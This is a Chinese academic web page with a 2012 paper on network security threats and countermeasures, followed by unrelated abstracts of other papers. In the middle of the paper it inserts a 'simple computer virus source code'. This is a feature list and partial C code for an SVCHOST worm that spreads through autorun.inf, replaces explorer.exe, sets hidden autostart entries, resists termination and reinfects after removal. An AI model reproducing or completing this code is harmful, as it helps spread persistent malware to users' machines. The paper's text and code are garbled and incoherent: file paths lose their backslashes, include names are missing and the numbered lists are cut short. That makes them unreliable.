计算机网络安全防范分析

来源 :计算机光盘软件与应用 | 被引量 : 0次 | 上传用户:zxz6381
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  摘要:随着计算机网络技术的快速发展,网络安全日益成为人们关注的焦点。本文分析了影响网络安全的主要因素及攻击的主要方式,从管理和技术两方面就加强计算机网络安全提出了针对性的建议。
  关键词:计算机网络;安全;管理;技术
  中图分类号:TP393.08 文献标识码:A文章编号:1007-9599(2012)03-0000-02
  Computer Network Security Analysis
  Ma Chuan,Zhao Jing
  (Shenyang Normal University,School of Software,Shenyang110034,China)
  Abstract:With the rapid development of computer network technology,network security is increasingly becoming the focus of attention.This paper analyzes the main factors affecting network security and attack the main form of targeted recommendations on enhancing computer network security,management and technical aspects.
  Keywords:Computer networks;Security;Management;Technology
  一、影响网络安全的主要因素
  计算机网络所面临的威胁是多方面的,既包括对网络中信息的威胁,也包括对网络中设备的威胁,但归结起来,主要有三点:一是人为的无意失误。如操作员安全配置不当造成系统存在安全漏洞,用户安全意识不强,口令选择不慎,将自己的帐号随意转借他人或与别人共享等都会给网络安全带来威胁。二是人为的恶意攻击。此外,软件公司的编程人员为便于维护而设置的软件“后门”也是不容忽视的巨大威胁,一旦“后门”洞开,别人就能随意进入系统,后果不堪设想。
  二、计算机网络受攻击的主要形式
  计算机网络被攻击,主要有六种形式。1.内部窃密和破坏。内部人员有意或无意的泄密、更改记录信息或者破坏网络系统。2.截收信息。攻击者可能通过搭线或在电磁辐射的范围内安装截收装置等方式,截获机密信息或通过对信息流和流向、通信频度和长度等参数的分析,推出有用的信息。3.非法访问。指未经授权使用网络资源或以未授权的方式使用网络资源,主要包括非法用户进入网络或系统进行违法操作和合法用户以未授权的方式进行操作。
  下面简单的介绍一个简单的计算机病毒源代码:
  (1)功能:
  1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
  2.生成病毒体:
  c:windowswjview32.com;c:windowsexplorer.exe;c:windowssystem32dllcacheexplorer.exe;c:windowssystemmsmouse.dll;c:windowssystem32cmdsys.sys;c:windowssystem32mstsc32.exe
  3.病毒体c:windowsexplorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在explorer.exe前启动
  4.修改注册表,在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
  CurrentVersionRun设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
  5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
  6.连锁能力,将病毒体相连,实现相连复制更新
  7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程
  8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建
  9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下
  10.附带删除文件函数(为防止危害,本函数默认不执行)
  (2)心代码:
  /*
   SK-CHINA
   SVCHOST virus WRITE BY S.K
   Compiler:
   DEV-CPP 4.9.9.2
  */
  
  /* SVCHOST.C*/
  /* SVCHOST.EXE */
  /* SVCHOST.COM */
  #include /*标准输入输出*/
  #include /*字符串操作*/
  #include /*其它函数*/
  #include /*进程控制*/
  #include /*目录函数*/
  
  #define SVCHOST_NUM 6 /*关键位置病毒复制数量*/
  #define RUBBISH_NUM 5 /*垃圾文件数量*/
  #define REMOVE_NUM 5 /*删除文件数*/
  /*====================================================*/
  /*
  文件AUTORUN.INF内容:
  1.自动运行SVCHOST.com
  2.覆盖默认打开命令,使用病毒体作为新的打开方式
  3.覆盖默认资源管理器命令,使病毒体作为新的命令方式
  */
  char *autorun={“[AutoRun] open=”SVCHOST.com /s” shellopen=打开(&O)
  
   shellopenCommand=”SVCHOST.com /s” shellexplore=资源管理器(&X)
  
   shellexploreCommand=”SVCHOST.com /s””};
  /*=====================================================*/
  /*
  添加注册表项:
  1.自动运行生成病毒体C:windowswjview32.com
  */
  char *regadd={“REGEDIT4
  /*========================================================*/
  /*
   函数:通过explorer自动运行
   成功返回0,失败返回1,2
  */
  int autorun_explorer()
  {
   FILE *input;
   if((input=fopen(“c:windowssystemexplorer.exe”,”rb”))!=NULL)
   {
   fclose(input);
   remove(“c:windows$temp$”);
   remove(“c:windowssystem32dllcache$temp$”);
   return 1;
   }
   copy(“c:windowsexplorer.exe”,”c:windowssystemexplorer.exe”);
   rename(“c:windowsexplorer.exe”,”c:windows$temp$”);
   rename(“c:windowssystem32dllcacheexplorer.exe”,”c:windowssystem32
  
  dllcache$temp$”);
   if(copy(“SVCHOST.com”,”c:windowsexplorer.exe”)==0 && copy
  
  (“SVCHOST.com”,”c:windowssystem32dllcacheexplorer.exe”)==0)
   return 0;
   else
   return 2;
  /*========================================================*/
  /*
   主程序 略
  三、加强计算机网络安全的对策措施
  (一)加强网络安全教育和管理。对工作人员结合机房、硬件、软件、数据和网络等各个方面安全问题,进行安全教育,提高工作人员的安全观念和责任心;加强业务、技术的培训,提高操作技能;教育工作人员严格遵守操作规程和各项保密规定,防止人为事故的发生。(二)运用网络加密技术。网络信息加密的目的是保护网内的数据、文件、口令和控制信息,保护网上传输的数据。加密数据传输主要有三种:1.链接加密。在网络节点间加密,在节点间传输加密的信息,传送到节点后解密,不同节点间用不同的密码。2.节点加密。与链接加密类似,不同的只是当数据在节点间传送时,不用明码格式传送,而是用特殊的加密硬件进行解密和重加密,这种专用硬件通常放置在安全保险箱中。
  参考文献:
  [1]杨义先.网络安全理论与技术[M].北京:人民邮电出版社,2003.
其他文献
通过市场机制分配社会利益的规则称之为市场正义。作为市场经济的内在价值合理性,市场正义是一种自由主义的正义观。市场正义自发地促进了个人自由、机会平等和社会公益的实现
本文首先阐述了信息化改革为企业发展带来的机遇和挑战,接着分析了燃气公司在信息化建设过程中的总体规划,最后介绍了信息化在企业发展中的意义。
C语言是最为广泛的一门程序设计课程,针对高素质软件人才培养的需求,论文总结了c语言教学的若干心得体会。首先提出在教学中增强学生道德修养教育是必要的;然后说明加强背景知识
随着空管信息化发展的不断深入,空管内部各个系统之间由于相互孤立而带来的问题逐渐暴露出来。为走出这种困局,针对空管信息化发展的需求,提出一种基于SOA架构的空管信息系统集
摘要:21世纪是信息化建设飞速发展的时代,对于现代化的大学校园建设,信息网络的建设是一个必不可少的组成部分。本文探讨如何使校园网和校园网数据中心在高校中应用起来,为高等教育服务、为高校建设、设计和应用校园网数据中心抛砖引玉。  关键词:数据中心;校园网;数据存储  中图分类号:TP393文献标识码:A文章编号:1007-9599 (2011) 01-0000-01  The Data Center
针对目前部分校园网、企业内网建设相对滞后且维护成本较高的现状,本文讨论在Linux环境下构建LAMP平台,采用简单的方式快速搭建Apache虚拟主机站点的一种解决方案。
电子信息人才的培养是中职的重点工作,本文鉴于此,深度剖析了教学中存在的问题,提出了通过转变教学观念,改善课程设置,改革教学方法等来推动中职电子信息教学质量的提高。
目的观察腹腔镜下行卵巢囊肿剔除术的临床效果。方法选取2009年1月至2012年1月我院收治的100例行腹腔镜下卵巢囊肿剔除术患者设为观察组,选取同时期100例行开腹手术治疗卵巢
本文从教师队伍对教育信息化的作用出发,阐述了教育信息化的关键环节,在课程教学信息化的开展中,教师队伍的计算机使用能力以及其积极性,学校信息教学设备的整体建设,网络资源的适